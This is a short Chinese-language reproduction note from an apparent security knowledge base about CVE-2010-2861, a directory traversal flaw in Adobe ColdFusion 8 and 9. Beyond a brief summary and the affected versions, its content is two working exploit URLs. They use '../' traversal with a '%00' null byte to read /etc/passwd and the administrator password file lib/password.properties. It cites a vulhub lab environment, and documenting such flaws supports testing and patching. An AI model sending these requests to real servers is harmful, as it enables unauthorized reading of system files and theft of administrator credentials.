menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 005-Adobe ColdFusion chevron_right 001-CVE-2010-2861 Adobe ColdFusion 文件读取漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-CVE-2010-2861 Adobe ColdFusion 文件读取漏洞.md
    700 B / 2021-07-17 00:01:20
        # CVE-2010-2861 Adobe ColdFusion 文件读取漏洞

## 漏洞简介

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

## 漏洞影响

Adobe ColdFusion 8

Adobe ColdFusion 9

## 复现过程

直接访问

`http://url:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en`,即可读取文件`/etc/passwd:`

![](images/15889265283135.png)


读取后台管理员密码

`http://url:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en:`

![](images/15889265635934.png)


## 参考链接

https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/
    links
    file_download